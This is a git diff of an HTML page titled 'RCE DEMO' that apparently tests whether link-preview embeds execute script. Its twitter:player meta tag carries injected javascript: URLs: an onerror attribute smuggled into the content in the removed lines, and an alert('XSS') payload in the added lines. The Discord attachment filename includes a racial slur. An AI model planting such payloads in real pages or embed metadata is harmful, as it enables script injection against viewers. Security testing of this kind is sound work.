--- a/index.html
+++ b/index.html
@@ -1,8 +1,7 @@
 <!DOCTYPE html>
-<html>
-<head>
-    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
-    <meta name="twitter:player" content="src="javascript:console.log('test') "onerror="asd""">
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+	<meta name="twitter:player" content="https://cdn.discordapp.com/attachments/1137082896025407488/1137099402155130910/hoodnigga.rap2016-20220206-0001.mp4; URL='javascript:alert('XSS')'">
+
     
     <meta property="og:title" content="RCE DEMO">
     <meta property="og:description" content="asdasdf&lt;b&gt;Description&lt;/b&lt;&gt;">
@@ -11,15 +10,13 @@
     <meta property="og:image:type" content="image/jpg">
     <meta property="og:image:width" content="1280">
     <meta property="og:image:height" content="720">
-    <script>
-        document.addEventListener('DOMContentLoaded', function() {
-            var metaTag = document.querySelector('meta[name="twitter:player"]');
-            var newVideoUrl = 'https://example.com'; // Replace with the new video URL
-            metaTag.setAttribute('content', newVideoUrl);
-        });
-    </script>
+    <meta property="og:video:url" content="https://example.com">
+    <meta property="og:video:type" content="text/html">
+    <meta property="og:video:width" content="1280">
+    <meta property="og:video:height" content="720">
 </head>
 <body>
-    test
-</body>
-</html>
+test
+
+
+</body></html>
